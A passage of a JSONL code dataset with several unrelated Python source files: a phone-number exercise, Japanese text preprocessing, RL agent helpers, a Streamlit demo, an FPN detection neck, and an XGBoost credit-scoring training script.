clean_row(wta):\n waste = {'-', '(', ')'}\n for i in waste:\n if i in wta:\n wta = wta.replace(i, '')\n return wta\n\n\ndef contact_list(raw_number):\n if len(raw_number) > 7:\n return {raw_number[-7:], raw_number[-10:-7]}\n elif len(raw_number) == 7:\n return {raw_number[-7:], '495'}\n\n\nkey, phone_dict = 0, {}\nfor row in f_in:\n phone_dict[key] = contact_list(clean_row(row.strip()))\n key += 1\n\nfor key in phone_dict:\n if key == 0:\n pass\n else:\n if phone_dict[0] == phone_dict[key]:\n print('YES')\n else:\n 
print('NO')\n","repo_name":"Maksym-Kryvenko/sb_gitClasses","sub_path":"coursera_practice/week.7/pr.7_12.py","file_name":"pr.7_12.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1791685138","text":"from morpheme import WordParser\nimport re\nfrom util import load_config\nimport logging\nlogging.config.dictConfig(load_config('log'))\nlogger = logging.getLogger(__name__)\n\nclass Word():\n __REGEX_JA = re.compile(r'[ぁ-んァ-ン一-龥]')\n __REGEX_EN = re.compile(r'[a-z]+', re.IGNORECASE)\n __REGEX_STOP_CHAR = re.compile(r'^([ァ-ン]|[ぁ-ん]{1,2})$', re.IGNORECASE)\n\n __PTN_DIGIT_ALL = r'[一二三四五六七八九十\\d]'\n\n __REGEXES_REPLACE = (\n (re.compile(r'大学$'), '大学'),\n (re.compile(r'新聞$'), '新聞'),\n (re.compile(r'^JR'), 'JR'),\n (re.compile(r'受験$'), '受験'),\n (re.compile(r'姉妹$'), '姉妹'),\n (re.compile(r'^iPhone{}$'.format(__PTN_DIGIT_ALL)), 'iPhone'),\n )\n\n __REGEXES_EXCLUDE = (\n re.compile(r'^{}+日目?$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+年(生|生まれ)?$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+期生$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+(月|人|歳|才|児)$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+万?円?$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+(戦|敗|勝|度)$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'(出身|県)$'),\n re.compile(r'キロ$'),\n re.compile('ごめん'),\n re.compile('決定'),\n re.compile('注意'),\n )\n\n def __init__(self):\n file_config = load_config('file')\n self.__parser = WordParser(**file_config['mecab'])\n with open(file_config['word']['stop_words']) as f:\n self.__stop_words = frozenset(f.read().rstrip().split('\\n'))\n\n def preprocess(self, text):\n words_processed = []\n morphs = self.__parser(text)\n for morph in morphs:\n morph.lexeme = self.__clean(morph.lexeme)\n if self.__valid(morph):\n words_processed.append(morph.lexeme)\n return words_processed\n\n def __clean(self, word):\n for regex, rep_word in self.__REGEXES_REPLACE:\n if regex.search(word):\n word = rep_word\n break\n\n for regex in self.__REGEXES_EXCLUDE:\n if regex.search(word):\n word = None\n break\n\n return word\n\n def __valid(self, morph):\n \"\"\"\n 原型をチェック\n 英語・カタカナ1文字だけ、ひらがな1文字or2文字は省く\n \"\"\"\n if morph.lexeme is None or morph.lexeme == '':\n return False\n\n if not self.__valid_pos(morph.pos):\n return False\n\n if self.__REGEX_STOP_CHAR.match(morph.lexeme):\n return False\n\n if morph.lexeme in self.__stop_words:\n return False\n return True\n\n def __valid_pos(self, pos):\n poses = pos.split('-')\n try:\n if poses[0] == '名詞' and poses[1] in ['一般', '固有名詞', 'サ変接続']:\n if poses[2] == '地域':\n return False\n return True\n else:\n return False\n except IndexError:\n return True\n","repo_name":"maomao905/fun2vec","sub_path":"word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33442876116","text":"import sys\nsys.path.append(\"../\")\nsys.path.append(\"../model\")\nfrom collections import deque\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nfrom IPython.display import clear_output\nimport network_loader\n\n\n\ndef get_path():\n path = os.path.dirname(sys.argv[0]) + '/'\n if not '/toy-model/' in path:\n path = os.getcwd() + '/'\n print(path)\n if path == '':\n path = './'\n #else:\n #index_start = path.index('/test/')\n #index_end = index_start + len('/toy-model/')\n #path = path[:index_start]\n return 
\"/media/shadowwalker/DATA/study/RIL1/code/carmanufacturing\"\n\ndef one_hot(states, kind_cars):\n length = len(states)\n occ = np.ones(length)\n occ[states == -1] = 0\n res = np.zeros((length, kind_cars))\n for i, state in enumerate(states):\n if occ[i]:\n res[i, state] = 1\n\n return occ, res\n\n\n\ndef linearize(states, kind_cars):\n length = len(states)\n occ, states = one_hot(states, kind_cars)\n states = states.reshape(length * (kind_cars))\n return np.concatenate([occ, states])\n\nclass Agent_wrapper():\n \n def __init__(self, net, KIND_CARS):\n self.net = net\n self.kind_cars = KIND_CARS\n \n def act(self, env, eval_mode = False, n_determined = None):\n if not n_determined:\n state = env.get_state()\n else:\n state = env.get_randomized_state(n_determined = n_determined)\n state = linearize(state, self.kind_cars)\n state = torch.tensor(state).float()\n\n with torch.no_grad():\n action_values = self.net(state).numpy()\n\n if eval_mode:\n possible_actions = env.possible_actions()\n for i in range(len(action_values)):\n if i not in possible_actions:\n action_values[i] = - float(\"inf\")\n\n return np.argmax(action_values)\n\n def q_values(self, state):\n state = linearize(state, self.kind_cars)\n state = torch.tensor(state).float()\n\n with torch.no_grad():\n return self.net(state).numpy()\n\nclass RandomPlayer():\n\n def act(self, env, eval_mode = False):\n actions = env.possible_actions()\n return np.random.choice(actions)\n\n\ndef add_agents(num_lines, capacity_lines, KIND_CARS, MA = False, SA = False, CP = False, Curr = False):\n\n choosen_options = int(MA) + int(SA) + int(CP) + int(Curr)\n if choosen_options == 0 or choosen_options > 1:\n print(\"you must choose exactly one option\")\n return None\n\n front_agents = []\n back_agents = []\n for _ in range(10):\n front_agents.append([])\n back_agents.append([])\n\n num_lines_string = 'NL:' + str(num_lines)\n capacity_lines_string = 'CL:' + str(capacity_lines)\n\n pathname = get_path() + 'results/'\n\n for subdir in os.listdir(pathname):\n if subdir[0] == '.':\n continue\n sign = subdir[0:2]\n if MA and sign != 'MA':\n continue\n if SA and sign != 'SA':\n continue\n if CP and sign != 'CP':\n continue\n if Curr and sign != 'CC':\n continue\n for filename in os.listdir(pathname + subdir):\n if filename[-4:] == '.pth':\n if num_lines_string in filename and capacity_lines_string in filename:\n network_name = pathname + subdir + '/' + filename\n net = network_loader.load_network(network_name)\n agent = Agent_wrapper(net, KIND_CARS)\n\n input_size_index = filename.index('I:') + 2\n input_size = int(filename[input_size_index])\n\n if MA or Curr:\n if 'Front' in filename:\n front_agents[input_size].append((filename[:-4], agent))\n else:\n if 'Back' in filename:\n back_agents[input_size].append((filename[:-4], agent))\n else:\n print('Something went wrong with ', filename)\n else:\n front_agents[input_size].append((filename[:-4], agent))\n if MA or Curr:\n return front_agents, back_agents\n else:\n return front_agents\n","repo_name":"anurag-198/CarManufacturingProblem","sub_path":"model/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42264187737","text":"import streamlit as st\nimport seaborn as sns\nimport pandas as pd\n\ncar_crashes = sns.load_dataset('car_crashes')\n\n@st.cache\ndef convert_df(df):\n return df.to_csv().encode('utf-8')\n\ncsv = convert_df(car_crashes)\n\nst.download_button(\n 
label=\"Download data as CSV\",\n data=csv,\n file_name='car_crashes.csv',\n mime='text/csv',\n )\n\nuploaded_file = st.file_uploader(\"Choose a file\")\nif uploaded_file is not None:\n dataframe = pd.read_csv(uploaded_file, encoding = 'utf-8)')\n st.write(dataframe)","repo_name":"Junmo1225/Homework","sub_path":"Achievement/downup2.py","file_name":"downup2.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25514980752","text":"import torch.nn.functional as F\nfrom mmdet.models import necks\n\nfrom torchok.constructor import DETECTION_NECKS\n\n\n@DETECTION_NECKS.register_class\nclass FPN(necks.FPN):\n r\"\"\"Feature Pyramid Network.\n\n This is an implementation of paper `Feature Pyramid Networks for Object\n Detection `_.\n\n Args:\n in_channels (list[int]): Number of input channels per scale.\n out_channels (int): Number of output channels (used at each scale).\n num_outs (int): Number of output scales.\n start_level (int): Index of the start input backbone level used to\n build the feature pyramid. Default: 0.\n end_level (int): Index of the end input backbone level (exclusive) to\n build the feature pyramid. Default: -1, which means the last level.\n add_extra_convs (bool | str): If bool, it decides whether to add conv\n layers on top of the original feature maps. Default to False.\n If True, it is equivalent to `add_extra_convs='on_input'`.\n If str, it specifies the source feature map of the extra convs.\n Only the following options are allowed\n\n - 'on_input': Last feat map of neck inputs (i.e. backbone feature).\n - 'on_lateral': Last feature map after lateral convs.\n - 'on_output': The last output feature map after fpn convs.\n relu_before_extra_convs (bool): Whether to apply relu before the extra\n conv. Default: False.\n no_norm_on_lateral (bool): Whether to apply norm on lateral.\n Default: False.\n conv_cfg (dict): Config dict for convolution layer. Default: None.\n norm_cfg (dict): Config dict for normalization layer. Default: None.\n act_cfg (dict): Config dict for activation layer in ConvModule.\n Default: None.\n upsample_cfg (dict): Config dict for interpolate layer.\n Default: dict(mode='nearest').\n init_cfg (dict or list[dict], optional): Initialization config dict.\n\n Example:\n >>> import torch\n >>> in_channels = [7, 5, 3, 2]\n >>> scales = [340, 170, 84, 43]\n >>> inputs = [torch.rand(1, c, s, s)\n ... for c, s in zip(in_channels, scales)]\n >>> self = FPN(in_channels, 11, len(in_channels)).eval()\n >>> outputs = self.forward(inputs)\n >>> for i in range(len(outputs)):\n ... print(f'outputs[{i}].shape = {outputs[i].shape}')\n outputs[0].shape = torch.Size([1, 11, 340, 340])\n outputs[1].shape = torch.Size([1, 11, 170, 170])\n outputs[2].shape = torch.Size([1, 11, 84, 84])\n outputs[3].shape = torch.Size([1, 11, 43, 43])\n \"\"\"\n\n def __init__(self, in_channels, **kwargs):\n in_channels = list(in_channels[::-1])\n super(FPN, self).__init__(in_channels=in_channels, **kwargs)\n\n def forward(self, inputs):\n \"\"\"Forward function.\"\"\"\n assert len(inputs) == len(self.in_channels)\n\n # build laterals\n laterals = [\n lateral_conv(inputs[i + self.start_level])\n for i, lateral_conv in enumerate(self.lateral_convs)\n ]\n\n # build top-down path\n used_backbone_levels = len(laterals)\n for i in range(used_backbone_levels - 1, 0, -1):\n # In some cases, fixing `scale factor` (e.g. 
2) is preferred, but\n # it cannot co-exist with `size` in `F.interpolate`.\n if 'scale_factor' in self.upsample_cfg:\n # fix runtime error of \"+=\" inplace operation in PyTorch 1.10\n laterals[i - 1] = laterals[i - 1] + F.interpolate(\n laterals[i], **self.upsample_cfg)\n else:\n prev_shape = laterals[i - 1].shape[2:]\n laterals[i - 1] = laterals[i - 1] + F.interpolate(\n laterals[i], size=prev_shape, **self.upsample_cfg)\n\n # build outputs\n # part 1: from original levels\n outs = [\n self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels)\n ]\n # part 2: add extra levels\n if self.num_outs > len(outs):\n # use max pool to get more levels on top of outputs\n # (e.g., Faster R-CNN, Mask R-CNN)\n if not self.add_extra_convs:\n for i in range(self.num_outs - used_backbone_levels):\n outs.append(F.max_pool2d(outs[-1], 1, stride=2))\n # add conv layers on top of original feature maps (RetinaNet)\n else:\n if self.add_extra_convs == 'on_input':\n extra_source = inputs[self.backbone_end_level - 1]\n elif self.add_extra_convs == 'on_lateral':\n extra_source = laterals[-1]\n elif self.add_extra_convs == 'on_output':\n extra_source = outs[-1]\n else:\n raise NotImplementedError\n outs.append(self.fpn_convs[used_backbone_levels](extra_source))\n for i in range(used_backbone_levels + 1, self.num_outs):\n if self.relu_before_extra_convs:\n outs.append(self.fpn_convs[i](F.relu(outs[-1])))\n else:\n outs.append(self.fpn_convs[i](outs[-1]))\n return tuple(outs)\n","repo_name":"eora-ai/torchok","sub_path":"torchok/models/necks/detection/fpn.py","file_name":"fpn.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"95"} +{"seq_id":"19876011679","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[37]:\n\n\n# !/usr/bin/env python\n# ! 
-*- coding: utf-8 -*-\n\n'''\n@File: model_fit_v3.py\n@Author: RyanZheng\n@Email: ryan.zhengrp@gmail.com\n@Created Time on: 2020-07-26\n'''\n\nimport os\nimport warnings\nfrom datetime import datetime\n\nimport joblib\n\nfrom model_code import tree_selection\nfrom model_code.woe_transformer import *\nfrom model_code.feature_binning import *\nfrom model_code.bayes_opt_tuner import classifiers_model\nfrom model_code.utils import *\nfrom model_code.detector import detect\n\nwarnings.filterwarnings('ignore')\n\nfrom model_code.logger_utils import Logger\n\nlog = Logger(level='info', name=__name__).logger\n\n# =========================step 1 相关配置=========================\nlog.info('step 1 相关配置')\nfeature_type = 'lhpdat' # 什么数据\ncust_id = 'apply_no' # 主键\ntarget = 'target' # 目标变量\ndata_type = 'type' # 区分数据集变量\napply_time = 'apply_time' # 时间\n\nclient = 'lhp09'\nbatch = 'p23'\n\nto_model_var_num = 30 # 不限制的话修改为None\nis_model_data_to_woe = False # 喂入模型的数据是否需要转化为woe值,False不需要,即原始数据入模型\nfillna_value = -999999 # 缺失值填充的值\n\n# 阈值配置\nexclude_cols = [apply_time, cust_id, target, data_type, 'apply_month']\nfeature_missing_threshould = 0.95 # 缺失率大于等于该阈值的变量剔除\n\n# 用于训练模型的数据\nlabel_encoder_dict = {}\nto_model_data_path = '/Users/ryanzheng/PycharmProjects/data_to_treemodel_v1/to_model_data/lhp_amount_rule.csv'\n\n# =========================后续代码基本可以不用动=========================\n\n\n# 基本不用动\nproject_name = '{}{}'.format(client, batch)\nclient_batch = '{}{}'.format(client, batch)\nproject_dir = 'model_result_data/{}/{}/'.format(client, batch)\noutput_dir = '{}model/{}/'.format(project_dir, feature_type)\n\nos.makedirs(project_dir, exist_ok=True)\nos.makedirs(output_dir, exist_ok=True)\nos.makedirs(project_dir + 'data/score/', exist_ok=True)\nos.makedirs(project_dir + 'data/xgb_score/', exist_ok=True)\n# 基本不用动\n# =========================相关配置=========================\n\n\n# In[38]:\n\n\n# =========================step 2 读取数据集=========================\nlog.info('step 2 开始读取数据集')\n# 读取宽表数据\nlog.info('读取样本&特征数据集:{}|{}|{}为样本数据,其他为特征数据'.format(cust_id, apply_time, target))\nall_data = pd.read_csv(to_model_data_path)\n\n# drop_cols = ['xy_black_version', 'tzre_version']\n# all_data.drop(columns=drop_cols, axis=1, inplace=True)\nall_data.drop(['applthst_loan_amount', 'tzre_report_info_report_no', 'xy_black_trade_no', 'tzre_id', 'xy_black_version',\n 'tzre_version', 'tzre_bi_phone_number'], axis=1, inplace=True)\n\nall_data.set_index(cust_id, inplace=True)\nselected_features = all_data.columns.format()\nselected_features = list(set(selected_features) - set(exclude_cols))\nlog.info('特征的个数:{}'.format(len(selected_features)))\n\n# =========================读取字典进行重命名=========================\n# ##读取字典进行重命名\n# fea_dict_df = pd.read_excel('/home/marketingscore/ryanzheng/fit_model_project/新特征数据字典v3.xlsx')\n# fea_dict = fea_dict_df[['feature_code','feature_id']].set_index('feature_code')['feature_id'].to_dict()\n# all_data.rename(columns=fea_dict, inplace=True)\n\n# selected_features = all_data.columns.format()\n# selected_features = list(set(selected_features) - set(exclude_cols))\n# # if exclude_vars:\n# # selected_features = list(set(selected_features) - set(exclude_vars))\n\n# ##仅使用数据字典中有的变量\n# fea_dict_df_list = fea_dict_df['feature_id'].tolist()\n# selected_features = list(set(selected_features).intersection(set(fea_dict_df_list)))\n# print(len(selected_features))\n# ##仅使用数据字典中有的变量\n\n# =========================读取字典进行重命名=========================\n\n\n# 删除特征全为空的样本量\nlog.info('删除特征全为空的样本量')\nprint('删除特征全为空的样本之前的数据集行列:', 
all_data.shape)\nall_data.dropna(subset=selected_features, how='all', inplace=True)\nprint('删除特征全为空的样本之后的数据集行列:', all_data.shape)\n\nlog.info('样本数据集情况:')\nlog.info(all_data[target].value_counts())\n# =========================读取数据集=========================\n\nlog.info('EDA,整体数据探索性数据分析')\nall_data_eda = detect(all_data)\nall_data_eda.to_excel('{}{}_{}_all_data_eda.xlsx'.format(\n output_dir, project_name, feature_type))\n\n# =========================step 3 划分训练集和测试集=========================\nlog.info('step 3 划分训练集和测试集')\nif data_type not in all_data.columns:\n df_sample = all_data[[target, apply_time]]\n df_sample.reset_index(inplace=True)\n\n # 随机切分train、test\n df_sample = split_data_type(df_sample, key_col=cust_id, target=target, apply_time=apply_time, test_size=0.25)\n df_sample.to_csv(project_dir + 'data/{}_split.csv'.format(client_batch), index=False)\n\n # #按时间切分\n # df_oot = df_sample[df_sample['apply_time']>= '2020-04-01']\n # X_train = df_sample[df_sample['apply_time']<= '2020-02-01']\n # X_test = df_sample[(df_sample['apply_time']> '2020-02-01') & (df_sample['apply_time']< '2020-04-01')]\n\n # df_sample.loc[df_oot.index,'type'] = 'oot'\n # df_sample.loc[X_train.index,'type'] = 'train'\n # df_sample.loc[X_test.index,'type'] = 'test'\n\n df_sample.to_csv(project_dir + 'data/{}_split.csv'.format(client_batch), index=False)\n df_sample.set_index(cust_id, inplace=True)\n print(df_sample['type'].value_counts())\n\n# In[39]:\n\n\n# 将数据集类别和数据集合并\n# df_sample = all_data[[target, apply_time, data_type]]\nall_data = pd.merge(df_sample[['type']], all_data, left_index=True, right_index=True, how='inner')\n\nlog.info('分开训练集和测试集为两个df')\ntrain_data = all_data[all_data['type'] == 'train']\n# test_data = all_data[all_data['type'] == 'test']\n\nlog.info('EDA,训练集探索性数据分析')\ndetect(train_data).to_excel('{}{}_{}_train_data_eda.xlsx'.format(\n output_dir, project_name, feature_type))\n# detect(test_data).to_excel('{}{}_{}_test_data_eda.xlsx'.format(\n# output_dir, project_name, feature_type))\n\n# =========================step 4 初筛=========================\nlog.info('step 4 变量初筛')\n# selected_features = train_data_eda[train_data_eda['missing_q'] <= 0.95].index.to_list()\nprint('删除缺失率前变量数量:', len(selected_features))\nselected_features = filter_miss(train_data[selected_features], miss_threshold=feature_missing_threshould)\nprint('删除缺失率后变量数量:', len(selected_features))\ntrain_data = train_data[selected_features + [target]]\n# test_data = test_data[selected_features + [target]]\n# =========================初筛=========================\n\n\n# =========================step 5 数据处理=========================\nlog.info('step 5 数据woe处理')\n\n# 离散变量数据处理\n# selected_features = list(set(selected_features) - set(exclude_cols))\ncontinuous_cols, category_cols, date_cols = select_features_dtypes(train_data[selected_features])\n\ntrain_data.loc[:, continuous_cols] = train_data.loc[:, continuous_cols].fillna(fillna_value)\n# test_data.loc[:, continuous_cols] = test_data.loc[:, continuous_cols].fillna(fillna_value)\nall_data.loc[:, continuous_cols] = all_data.loc[:, continuous_cols].fillna(fillna_value)\n# data.loc[:, continuous_cols] = data.loc[:, continuous_cols].fillna(-999)\n\n# =========================labelencode=========================\n# def category_to_labelencoder(data, labelencoder=[]):\n# label_encoder_dict = {}\n# le = LabelEncoder()\n# for col in labelencoder:\n# print('{} in process!!!'.format(col))\n# data[col] = le.fit_transform(data[col].values)\n# number = [i for i in range(0, len(le.classes_))]\n# key = 
list(le.inverse_transform(number))\n# label_encoder_dict[col] = dict(zip(key, number))\n# return label_encoder_dict\n\n\n# def category_to_labelencoder_apply(data, labelencoder_dict={}):\n# for col, mapping in labelencoder_dict.items():\n# print('{} in process!!!'.format(col))\n# data[col] = data[col].map(mapping).fillna(-1)\n# data[col] = data[col].astype(int)\n\n\n# if category_cols:\n# train_data.loc[:, category_cols] = train_data.loc[:, category_cols].fillna('-1007')\n# all_data.loc[:, category_cols] = all_data.loc[:, category_cols].fillna('-1007')\n# label_encoder_dict = category_to_labelencoder(train_data, category_cols)\n# category_to_labelencoder_apply(all_data, label_encoder_dict)\n\n# =========================labelencode=========================\n\n\nif category_cols and not label_encoder_dict:\n log.info('step 5.1 类别变量数据处理')\n # train_data.loc[:, category_cols] = train_data.loc[:, category_cols].fillna('miss')\n # test_data.loc[:, category_cols] = test_data.loc[:, category_cols].fillna('miss')\n\n var_value_woe = category_2_woe(train_data, category_cols, target=target)\n category_2_woe_save(var_value_woe, '{}'.format(output_dir))\n # var_value_woe = category_2_woe_load('{}'.format(output_dir))\n train_data = WoeTransformer().transform(train_data, var_value_woe)\n # test_data = WoeTransformer().transform(test_data, var_value_woe)\n all_data = WoeTransformer().transform(all_data, var_value_woe)\n\n# 离散变量数据处理\n\n\n# In[40]:\n\n\nif is_model_data_to_woe:\n log.info('将箱子转woe')\n log.info('============入模数据需要转化为woe值===========')\n # train_data_to_model = WoeTransformer().transform(train_data_bin, fb.get_var_bin_woe())\n # test_data_to_model = WoeTransformer().transform(test_data_bin, fb.get_var_bin_woe())\n #all_data_to_model = WoeTransformer().transform(all_data_bin, fb.get_var_bin_woe())\nelse:\n log.info('============入模数据不需要转化为woe值===========')\n # train_data_to_model = train_data.copy()\n # test_data_to_model = test_data.copy()\n all_data_to_model = all_data.copy()\n\n\n# In[41]:\n\n\ndef statistics_model_result(all_data=pd.DataFrame()):\n # ===========================step 6 统计=================================\n all_data['score'] = all_data[feature_type].map(lambda v: to_score(v))\n log.info('模型相关结果统计!!!')\n df_splitted_type_auc_ks = all_data.groupby(data_type).apply(\n lambda df: pd.Series({'auc': get_roc_auc_score(df[target], df['score']),\n 'ks': get_ks(df[target], df['score'])}))\n df_splitted_type_auc_ks = df_splitted_type_auc_ks.reindex(['train', 'test', 'oot', 'cv'])\n\n log.info('模型效果:')\n print(df_splitted_type_auc_ks)\n\n all_data['month'] = all_data[apply_time].map(lambda s: s[:7])\n df_monthly_auc_ks = all_data.groupby('month').apply(\n lambda df: pd.Series({'auc': get_roc_auc_score(df[target], df['score']),\n 'ks': get_ks(df[target], df['score'])}))\n del all_data['month']\n log.info('不同月份的模型效果:')\n print(df_monthly_auc_ks)\n\n df_desc = all_data[[feature_type, 'score']].describe()\n df_desc.loc['coverage'] = df_desc.loc['count'] / all_data.shape[0]\n log.info('分数describe')\n print(df_desc)\n\n all_data[data_type] = all_data[data_type].map(lambda s: s.lower())\n all_data['client_batch'] = client_batch\n # df_psi,df_psi_details = psi_statis(all_data, splitted_types=['train','test','oot'], scores=[feature_type])\n df_psi, df_psi_details = psi_statis(all_data, splitted_types=['train', 'test'], scores=[feature_type])\n del all_data['client_batch']\n log.info('模型psi:')\n print(df_psi[['train_test_psi']])\n # log.info(df_psi[['train_test_psi','train_oot_psi']])\n\n 
df_output_statis = df_splitted_type_auc_ks.reset_index()\n df_output_statis['feature'] = feature_type\n df_output_statis['project_name'] = project_name\n df_output_statis['client_batch'] = client_batch\n df_output_statis = df_output_statis.pivot_table(\n index=['project_name', 'client_batch', 'feature'],\n columns=data_type,\n values=['auc', 'ks'])\n df_output_statis.columns = ['_'.join(reversed(x)) for x in df_output_statis.columns]\n df_output_statis['feature_cnt'] = len(selected_features)\n df_output_statis['n_estimators'] = model.get_params()['n_estimators']\n\n log.info('统计结束')\n return df_output_statis\n # ===========================统计=================================\n\n\n# In[42]:\n\n\n# =========================step 6 训练模型=========================\nX_all, y_all, X_train, y_train, X_test, y_test, X_oot, y_oot = get_splitted_data(\n all_data_to_model, target=target, selected_features=selected_features)\n\nprint('整体数据集大小:', X_all.shape)\nprint('训练集大小:', X_train.shape)\nprint('测试集大小:', X_test.shape)\nif X_oot is None:\n print('无oot数据集')\nelse:\n print('oot集大小:', X_oot.shape)\n\npd.Series(X_test.index).to_csv('{}{}_{}_X_test_key_{}.csv'.format(\n output_dir, project_name, feature_type, cust_id), header=cust_id, index=False)\n\nlog.info('step 6 开始训练模型')\nstart = datetime.now()\n\nlog.info('step 6.1 ===筛选变量===')\n\n# ===========================================\n\nlog.info('step 6.1 ===筛选变量===10折交叉后,计算变量的平均重要性')\n# feature_imp = tree_selection.kfold_xgb_model(train_data=(del_corr_df, y_train))\nlog.info('筛选前数据集大小:{}'.format(X_train.shape))\nfeature_imp = tree_selection.change_col_subsample_fit_model(train_data=(X_train, y_train),\n test_data=(X_test, y_test))\n\nlog.info('将特征重要性持久化')\nfeature_imp.to_csv('{}{}_{}_xgb_allfeature_mean_imp_df.csv'.format(\n output_dir, project_name, feature_type))\n\nlog.info('根据10折拟合模型处理后的变量重要性进行变量相关性筛选')\ndel_corr_df = tree_selection.drop_corr(X_train, by=feature_imp, threshold=0.9)\n# del_corr_df = tree_selection.drop_corr(del_corr_df, by=feature_imp, threshold=0.8)\nlog.info('筛选后数据集大小:{}'.format(del_corr_df.shape))\n\n# ===========================================\n\nselected_features = list(del_corr_df.columns)\nlog.info('最终入模变量的数量:{}'.format(len(selected_features)))\nlog.info('最终入模变量:{}'.format(selected_features))\n\nfeature_imp = tree_selection.change_col_subsample_fit_model(train_data=(del_corr_df, y_train),\n test_data=(X_test[del_corr_df.columns], y_test))\n\nlog.info('将待入模特征重要性持久化')\nfeature_imp.to_csv('{}{}_{}_xgb_tomodel_feature_mean_imp_df.csv'.format(\n output_dir, project_name, feature_type))\n\nlog.info('贝叶斯进行模型调参')\nmodel = classifiers_model(train_data=(X_train[selected_features], y_train),\n test_data=(X_test[selected_features], y_test),\n init_points=5, iterations=8, verbose=1)\nlog.info('模型调参完成!!!')\nlog.info('模型参数:{}'.format(model.get_xgb_params()))\nlog.info('模型参数:{}'.format(model.get_params()))\n\ndf_featurescore = pd.DataFrame(list(model._Booster.get_fscore().items()), columns=['特征名称', '特征权重值']\n ).sort_values('特征权重值', ascending=False)\ndf_featurescore.to_csv('{}{}_{}_xgb_featurescore_first.csv'.format(\n output_dir, project_name, feature_type), index=False)\n\nend = datetime.now()\nlog.info('模型训练完成, 使用 {} 秒'.format((end - start).seconds))\n\n# X_all = pd.concat([X_train, X_test])\nX_all[feature_type] = model.predict_proba(X_all[selected_features])[:, 1]\nall_data = pd.concat([all_data_to_model, X_all[feature_type]], axis=1)\n\nstatistics_model_result(all_data=all_data)\n\n# X_all.to_csv('{}{}_{}_X_all.csv'.format(output_dir, 
project_name, feature_type))\n# all_data.to_csv('{}{}_{}_all_data.csv'.format(output_dir, project_name, feature_type))\n\n\nif to_model_var_num:\n start = datetime.now()\n\n print('过滤前{}个特征出来,再次训练'.format(to_model_var_num))\n # importance = model._Booster.get_fscore()\n # importance = sorted(importance.items(), key=operator.itemgetter(1), reverse=True)\n # features_importance = pd.DataFrame()\n # features_importance = features_importance.append(importance, ignore_index=True)\n # features_importance.columns = ['特征名称', '特征权重值']\n # # features_importance.to_csv(\n # # '{}{}_{}_xgb_features_importance.csv'.format(output_dir, project_name, feature_type))\n # selected_features = features_importance.iloc[:to_model_var_num]['特征名称'].tolist()\n\n selected_features = df_featurescore.iloc[:to_model_var_num]['特征名称'].tolist()\n\n print('过滤后的特征:', selected_features)\n\n X_all, y_all, X_train, y_train, X_test, y_test, X_oot, y_oot = get_splitted_data(\n all_data_to_model, target=target, selected_features=selected_features)\n print('整体数据集大小:', X_all.shape)\n print('训练集大小:', X_train.shape)\n print('测试集大小:', X_test.shape)\n if X_oot is None:\n print('无oot数据集')\n else:\n print('oot集大小:', X_oot.shape)\n\n # 手动指定调参\n # model = xgb.XGBClassifier(**ini_params)\n # model.fit(X_train, y_train)\n\n # 贝叶斯调参\n log.info('贝叶斯进行模型调参')\n model = classifiers_model(train_data=(X_train[selected_features], y_train),\n test_data=(X_test[selected_features], y_test),\n init_points=5, iterations=8, verbose=1)\n log.info('模型调参完成!!!')\n log.info('模型参数:{}'.format(model.get_xgb_params()))\n log.info('模型参数:{}'.format(model.get_params()))\n\n end = datetime.now()\n log.info('模型训练完成, 使用 {} 秒'.format((end - start).seconds))\n\n# X_all = pd.concat([X_train, X_test])\nX_all[feature_type] = model.predict_proba(X_all[selected_features])[:, 1]\nall_data = pd.concat([all_data_to_model, X_all[feature_type]], axis=1)\n\ndf_output_statis = statistics_model_result(all_data=all_data)\n\n# X_all.to_csv('{}{}_{}_X_all.csv'.format(output_dir, project_name, feature_type))\n# all_data.to_csv('{}{}_{}_all_data.csv'.format(output_dir, project_name, feature_type))\n\n\n# ==========================训练模型=========================\n\n\n# In[43]:\n\n\n# ===========================step 7 模型持久化=================================\n\nlog.info('模型相关结果持久化')\nall_data[feature_type].to_frame().to_csv(\n '{}/data/score/{}_{}_score.csv'.format(project_dir, project_name, feature_type))\nall_data[feature_type].to_frame().to_csv(\n '{}/data/xgb_score/{}_{}_score.csv'.format(project_dir, project_name, feature_type))\nall_data[feature_type].to_frame().to_csv('{}{}_{}_score.csv'.format(\n output_dir, project_name, feature_type))\n\njoblib.dump(model._Booster, '{}{}_{}_xgb.ml'.format(\n output_dir, project_name, feature_type))\njson.dump(model.get_params(), open('{}{}_{}_xgb.params'.format(\n output_dir, project_name, feature_type), 'w'))\n\nmodel._Booster.dump_model('{}{}_{}_xgb.txt'.format(output_dir, project_name, feature_type))\n\ndf_featurescore = pd.DataFrame(list(model._Booster.get_fscore().items()), columns=['特征名称', '特征权重值']\n ).sort_values('特征权重值', ascending=False)\ndf_featurescore.to_csv('{}{}_{}_xgb_featurescore.csv'.format(\n output_dir, project_name, feature_type), index=False)\n\ndf_corr = X_all.corr()\ndf_corr.to_csv('{}{}_{}_xgb_corr.csv'.format(\n output_dir, project_name, feature_type), index_label='feature')\n\ndf_rawdata = all_data[selected_features]\ndf_rawdata.reset_index(inplace=True)\ndf_rawdata_col_name = 
